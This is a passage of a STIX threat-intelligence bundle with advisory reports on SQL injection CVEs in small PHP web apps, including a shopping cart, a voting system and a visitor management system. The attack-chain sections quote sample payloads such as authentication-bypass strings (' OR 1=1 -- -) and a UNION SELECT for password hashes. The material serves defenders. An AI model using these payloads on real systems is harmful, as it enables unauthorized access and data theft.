      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14642"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/sunjingyuan123/ccvvee/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14642"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846144"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376158"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376158/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cacd6841-8440-5b2e-a699-03d39a8372fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1ab974d2-cb1d-5f9e-ba6f-43b1047e8f77",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1ab974d2-cb1d-5f9e-ba6f-43b1047e8f77",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14652: SQL Injection in SourceCodester Simple and Nice Shopping Cart Script",
      "description": "## Overview\n\nA significant SQL injection vulnerability, tracked as CVE-2026-14652, has been discovered in SourceCodester Simple and Nice Shopping Cart Script version 1.0. This flaw specifically affects the `Admin Login` component, residing in the `/admin/login.php` file. An unauthenticated remote attacker can exploit this by crafting a malicious input to the `Username` argument. Successful exploitation could grant the attacker unauthorized access to the application, allow for information disclosure from the underlying database, or enable data manipulation, impacting the confidentiality, integrity, and availability of the system. The vulnerability has been publicly disclosed, increasing the likelihood of widespread exploitation attempts by malicious actors against unpatched instances. This poses a significant risk to organizations using this shopping cart script.\n\n## Attack Chain\n\n1.  An unauthenticated attacker initiates an HTTP POST request targeting the vulnerable `/admin/login.php` endpoint of the SourceCodester Simple and Nice Shopping Cart Script.\n2.  The attacker crafts a malicious SQL injection payload and inserts it into the `Username` parameter within the POST request body.\n3.  The web application receives the request and processes the `Username` argument without adequate input sanitization or validation.\n4.  The application concatenates the malicious input directly into an SQL query intended for database authentication.\n5.  The database server executes the malformed SQL query, which may bypass authentication checks, return sensitive data, or modify database records.\n6.  Upon successful SQL injection, the attacker gains unauthorized administrative access to the shopping cart application.\n7.  The attacker can then exfiltrate sensitive customer and order data, modify product information, or potentially compromise other parts of the system.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14652 can lead to severe consequences for organizations utilizing SourceCodester Simple and Nice Shopping Cart Script 1.0. Given that the vulnerability resides in the admin login portal, an attacker could gain complete control over the shopping cart system. This includes unauthorized access to sensitive customer information (names, addresses, payment details if stored), full control over product listings, order management, and potentially the ability to inject malicious code into the website affecting end-users. The public disclosure of the exploit increases the risk of widespread automated attacks, potentially leading to data breaches, reputational damage, and operational disruption for affected businesses.\n\n## Recommendation\n\n*   Immediately patch SourceCodester Simple and Nice Shopping Cart Script to a version where CVE-2026-14652 is resolved or remove the affected version if no patch is available.\n*   Deploy a Web Application Firewall (WAF) in front of web servers hosting the application and ensure WAF rules for SQL injection detection and prevention are enabled and actively blocking requests targeting `/admin/login.php`.\n*   Monitor web server access logs for requests to `/admin/login.php` containing unusual characters, SQL keywords, or multiple authentication failures, which may indicate exploitation attempts for CVE-2026-14652.\n*   Deploy the provided Sigma rule to your SIEM to detect exploitation attempts of CVE-2026-14652 by monitoring web server logs.\n",
      "published": "2026-07-04T21:18:54Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14652"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Yuesswor/cve/issues/2"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14652"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846692"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376165"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376165/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b79d1cc-5531-5a6f-baa3-bd57cc0d680e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d2b3cdc0-4062-5ba8-a3eb-5d76994a5147",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d2b3cdc0-4062-5ba8-a3eb-5d76994a5147",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14649: Remote SQL Injection in code-projects Online Voting System",
      "description": "## Overview\n\nA critical SQL injection vulnerability (CVE-2026-14649) has been identified in version 1.0 of the code-projects Online Voting System. This flaw, residing in the `test_input` function within the `/saveVote.php` file, allows an unauthenticated, remote attacker to execute arbitrary SQL commands on the backend database. Attackers can exploit this by manipulating specific parameters such as `voterName`, `voterEmail`, `voterID`, or `selectedCandidate` in HTTP POST requests. The vulnerability poses a significant risk as it can lead to unauthorized data access, modification, or potential full compromise of the voting system's integrity, impacting election results and voter privacy. Defenders need to prioritize patching and monitoring for malicious web requests targeting this endpoint.\n\n## Attack Chain\n\n1.  Attacker scans for internet-facing instances of `code-projects Online Voting System 1.0`.\n2.  Attacker identifies the `/saveVote.php` endpoint as a potential target for user input manipulation.\n3.  Attacker crafts an HTTP POST request containing malicious SQL characters (e.g., `' OR 1=1 -- -`) within the `voterName`, `voterEmail`, `voterID`, or `selectedCandidate` parameters.\n4.  The vulnerable `test_input` function in `/saveVote.php` processes the unsanitized input received from the HTTP request.\n5.  The malicious input is concatenated directly into a database query, leading to arbitrary SQL command execution on the backend.\n6.  The database executes the attacker's embedded SQL, which could be designed for data exfiltration (e.g., `UNION SELECT password_hash FROM users`), data modification, or privilege escalation.\n7.  The application returns an HTTP response containing results of the executed SQL query or an altered application state, confirming successful exploitation.\n8.  Attacker analyzes the response to extract sensitive data or confirm unauthorized changes to the voting system's records.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14649 allows an unauthenticated attacker to execute arbitrary SQL commands on the backend database. This can lead to severe consequences including unauthorized access to sensitive voter data, manipulation of voting records, or even complete compromise of the database. Such a breach could undermine the integrity of election results, expose personally identifiable information of voters, and cause significant reputational damage to the organization. While no specific victim count or sectors are mentioned, any organization using the affected Online Voting System 1.0 is at risk.\n\n## Recommendation\n\n*   Immediately patch `code-projects Online Voting System 1.0` to a version that addresses CVE-2026-14649. If no patch is available, consider implementing a web application firewall (WAF) with SQL injection detection rules.\n*   Deploy the Sigma rule \"Detects CVE-2026-14649 Exploitation — SQL Injection in Online Voting System\" to your SIEM for real-time detection of exploitation attempts.\n*   Enable comprehensive web server logging and review logs for suspicious HTTP POST requests to `/saveVote.php` containing SQL injection payloads.\n",
      "published": "2026-07-04T20:21:26Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "initial-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14649"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://gist.github.com/c4ttr4ck/a29b2238099fa07b4f072c21123b55ef"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14649"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376162"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376162/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2478e41-2a5d-5de6-a94f-064818756c73",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a9a1ec5-1ddf-5319-aa1a-d0ae7454f782",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--96c8acfd-3ed9-59bb-bd89-50d50eadd897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3a9a1ec5-1ddf-5319-aa1a-d0ae7454f782",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3a9a1ec5-1ddf-5319-aa1a-d0ae7454f782",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14648: Remote SQL Injection in code-projects Online Voting System",
      "description": "## Overview\n\nA significant security vulnerability, CVE-2026-14648, has been identified in the code-projects Online Voting System, affecting all versions up to and including 0.x and 1.0. This critical flaw stems from improper input neutralization within the `test_input` function in the `/authentication.php` file, specifically impacting the login component's handling of `adminUserName` and `adminPassword` arguments. Remote attackers can leverage this SQL injection to bypass authentication and potentially manipulate the underlying database. The vulnerability has been publicly disclosed, with a CVSS v3.1 base score of 7.3 (HIGH), indicating a high potential for in-the-wild exploitation. Defenders should prioritize patching and implement robust web application security measures to mitigate the risk posed by this easily exploitable flaw.\n\n## Attack Chain\n\n1.  Attacker identifies an instance of the vulnerable code-projects Online Voting System accessible over the internet.\n2.  The attacker crafts a malicious HTTP POST request targeting the `/authentication.php` endpoint on the exposed server.\n3.  Within the POST request, the attacker embeds SQL injection payloads into the `adminUserName` or `adminPassword` parameters, such as `' OR '1'='1'--`.\n4.  The vulnerable `test_input` function within `/authentication.php` processes the attacker's unsanitized input.\n5.  The unsanitized input is directly concatenated into an SQL query, leading to the execution of attacker-controlled SQL commands within the application's database context.\n6.  Successful SQL injection bypasses the login authentication mechanism, granting the attacker unauthorized access to the Online Voting System, potentially as an administrator.\n7.  With administrative access, the attacker can then exfiltrate sensitive user data, manipulate election results, deface the application, or establish further persistence.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14648 allows remote, unauthenticated attackers to gain unauthorized administrative access to the Online Voting System. This can lead to severe consequences, including the exfiltration of sensitive voter data (e.g., personal identifiable information), manipulation of election outcomes, system defacement, or complete compromise of the underlying database. The public disclosure of the exploit significantly increases the risk of widespread attacks against unpatched systems, potentially affecting government entities, educational institutions, or any organization utilizing this voting system.\n\n## Recommendation\n\n*   Immediately patch the code-projects Online Voting System to a version that addresses CVE-2026-14648.\n*   Deploy a Web Application Firewall (WAF) in front of internet-facing instances of the Online Voting System to filter and block malicious SQL injection attempts.\n*   Enable comprehensive web server access logging and audit logs for the Online Voting System to monitor for suspicious requests to `/authentication.php` containing SQL metacharacters, correlating with the Sigma rule.\n*   Deploy the provided Sigma rule to detect attempts to exploit CVE-2026-14648 in your environment.\n",
      "published": "2026-07-04T20:20:22Z",
      "labels": [
        "sql-injection",
        "webserver",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14648"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://gist.github.com/c4ttr4ck/ed954dc2e3da968eb460a18385146f4c"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14648"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846328"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376161"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376161/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4ddacfec-ca34-51bb-9477-69057440d48f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8a4237c2-b97c-58bc-a1a0-aa6ef0ec6cf9",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8a4237c2-b97c-58bc-a1a0-aa6ef0ec6cf9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SQL Injection in SourceCodester Class and Exam Timetabling System (CVE-2026-14641)",
      "description": "## Overview\n\nA high-severity SQL injection vulnerability, tracked as CVE-2026-14641, has been identified in SourceCodester Class and Exam Timetabling System version 1.0. This flaw allows unauthenticated, remote attackers to execute arbitrary SQL commands by manipulating the 'ID' argument within the `/edit_course.php` file. The vulnerability stems from improper neutralization of special elements in SQL commands, specifically CWE-89. The exploit has been publicly disclosed and is actively available, increasing the risk of widespread exploitation. This vulnerability enables attackers to potentially read, modify, or delete data from the backend database, compromising data confidentiality and integrity. Defenders should prioritize patching and implementing robust input validation to mitigate this threat.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious HTTP GET request targeting the `/edit_course.php` endpoint of the vulnerable SourceCodester Class and Exam Timetabling System.\n2.  The crafted request includes a specially malformed `ID` parameter in the URL query string, containing SQL injection payloads (e.g., `ID=1%27%20UNION%20SELECT%20...`).\n3.  The vulnerable `/edit_course.php` script processes the `ID` parameter without proper input sanitization or validation.\n4.  The application directly embeds the malicious `ID` parameter's value into a backend SQL query.\n5.  The database server executes the manipulated SQL query, which may bypass intended logic and allow the attacker to retrieve sensitive information or modify data.\n6.  The web server responds to the attacker's request, potentially disclosing sensitive database content (e.g., user credentials, system configurations, application data) within the HTTP response body.\n7.  The attacker parses the HTTP response to extract the compromised data, achieve data exfiltration, or modify database records.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14641 can lead to significant data breaches, where attackers can read, modify, or delete sensitive information stored in the application's database. This includes user accounts, academic records, scheduling data, and potentially administrative credentials. While specific victim counts are not available, the widespread use of SourceCodester systems in educational settings suggests that successful attacks could impact student and staff privacy, disrupt academic operations, and lead to reputational damage for affected institutions. The CVSS 3.1 score of 7.3 (High) indicates low impact on confidentiality, integrity, and availability, but SQL injection commonly leads to more severe consequences like full database compromise or even arbitrary code execution under certain configurations.\n\n## Recommendation\n\n*   Prioritize patching SourceCodester Class and Exam Timetabling System to a non-vulnerable version immediately to address CVE-2026-14641.\n*   Deploy the provided Sigma rule to your SIEM solution to detect exploitation attempts against the `/edit_course.php` endpoint.\n*   Ensure webserver logging (category: `webserver`) is enabled and configured to capture full HTTP request details, especially `cs-uri-stem` and `cs-uri-query`, to enable the rule.\n*   Implement web application firewalls (WAFs) with rules designed to detect and block SQL injection payloads targeting HTTP GET parameters.\n",
      "published": "2026-07-04T19:23:20Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "sourcecodester",
        "php"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14641"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/sunjingyuan123/ccvvee/issues/2"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14641"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846143"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/847955"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376157"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376157/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--294fed5a-e75f-52cb-93c2-e17d914b38bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://codeastro.com/",
      "pattern": "[url:value = 'https://codeastro.com/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:22:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e1f3b11-4a5a-58f4-9c2f-ba028cb45d67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "indicator--294fed5a-e75f-52cb-93c2-e17d914b38bc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a5e998f1-92fb-56f8-b8a5-fb1f5d72db1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/kk-333/cve/issues/1",
      "pattern": "[url:value = 'https://github.com/kk-333/cve/issues/1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:22:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--991558c3-b22f-565b-8077-99bc543fc8f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "indicator--a5e998f1-92fb-56f8-b8a5-fb1f5d72db1f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ffc3a336-5b4a-57a5-ae26-792cf0c520bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14640",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14640']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:22:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3cbdb5de-b82b-5355-80cb-f3175cc09890",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "indicator--ffc3a336-5b4a-57a5-ae26-792cf0c520bd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26b31a85-562c-5dab-b09f-12d3e5c86891",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/846010",
      "pattern": "[url:value = 'https://vuldb.com/submit/846010']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:22:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09360e14-cd2b-50ba-a497-1c25e3e6adfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "indicator--26b31a85-562c-5dab-b09f-12d3e5c86891"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--99c8f0d1-4c49-55bb-9c51-cf590e69f23f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376156",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376156']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:22:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--42a86551-eec8-5dd9-8132-1fd56c430ced",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "indicator--99c8f0d1-4c49-55bb-9c51-cf590e69f23f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d6ec60cd-42f6-555d-b3ba-9c7877f18539",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376156/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376156/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:22:32Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f9edfa31-fe7d-50b8-85d5-edc096d135e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "indicator--d6ec60cd-42f6-555d-b3ba-9c7877f18539"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7a2597e9-63e4-5c47-b069-f31df281f415",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--92fa74a5-7d54-5280-b2a7-0f1f75cc0d10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14640: CodeAstro Apartment Visitor Management System SQL Injection",
      "description": "## Overview\n\nA critical SQL injection vulnerability, CVE-2026-14640, has been identified in CodeAstro Apartment Visitor Management System version 1.0. This flaw affects an unspecified function within the `/index.php` file, specifically targeting the 'Login' component through manipulation of the `Username` argument. Attackers can remotely exploit this vulnerability to inject and execute arbitrary SQL queries against the backend database. The vulnerability has been publicly disclosed, and exploit code is available, making affected systems susceptible to immediate compromise. This allows unauthorized access to sensitive data, modification of database contents, and potentially further system control, posing a significant risk to organizations using this visitor management system.\n\n## Attack Chain\n\n1.  A remote attacker crafts a malicious HTTP POST request targeting the `/index.php` endpoint of the vulnerable application.\n2.  The POST request includes a specially crafted `Username` argument containing SQL injection payloads designed to bypass input validation.\n3.  The vulnerable CodeAstro Apartment Visitor Management System 1.0 processes this input without proper sanitization.\n4.  The embedded malicious SQL query is executed by the backend database, potentially revealing sensitive information like user credentials or database schema.\n5.  The attacker uses the extracted information to gain unauthorized access to the application or underlying database.\n6.  Further exploitation may include modifying database records, creating new administrative users, or exfiltrating confidential visitor data, leading to full system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14640 can lead to severe consequences for organizations utilizing CodeAstro Apartment Visitor Management System 1.0. Attackers can gain unauthorized read and write access to the underlying database, potentially compromising sensitive visitor information, administrative credentials, and system configurations. The compromise of confidentiality (C:L), integrity (I:L), and availability (A:L) as indicated by the CVSS score, means that data could be stolen, altered, or made unavailable. This direct access to visitor data could result in privacy breaches, reputational damage, and regulatory fines for affected organizations.\n\n## Recommendation\n\n*   Immediately apply patches or updates provided by CodeAstro for CVE-2026-14640 to mitigate the SQL injection vulnerability.\n*   Deploy the provided Sigma rule to your SIEM/WAF to detect attempts to exploit CVE-2026-14640 via SQL injection patterns in HTTP POST requests.\n*   Implement strong input validation on all user-supplied data, especially for login forms, to prevent SQL injection attempts at the application layer.\n*   Enable comprehensive web server access logging to capture full HTTP request details, including query strings and POST body content, for forensic analysis and detection tuning.\n",
      "published": "2026-07-04T19:22:32Z",
      "labels": [
        "sql-injection",
        "web-application",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "indicator--294fed5a-e75f-52cb-93c2-e17d914b38bc",
        "indicator--a5e998f1-92fb-56f8-b8a5-fb1f5d72db1f",
        "indicator--ffc3a336-5b4a-57a5-ae26-792cf0c520bd",
        "indicator--26b31a85-562c-5dab-b09f-12d3e5c86891",
        "indicator--99c8f0d1-4c49-55bb-9c51-cf590e69f23f",
        "indicator--d6ec60cd-42f6-555d-b3ba-9c7877f18539",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14640"
        },
        {
          "source_name": "reference",
          "url": "https://codeastro.com/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/kk-333/cve/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14640"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846010"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376156"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376156/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b01dc71-4dff-5f6b-acbe-3162067d49a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85281025-a989-50cc-9b46-89f9f020dc80",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46113c65-8289-5a4b-8c2c-d5de751ffcff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85281025-a989-50cc-9b46-89f9f020dc80",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--85281025-a989-50cc-9b46-89f9f020dc80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14637: Critical Deserialization Vulnerability in kirilkirkov Ecommerce-CodeIgniter-Bootstrap",
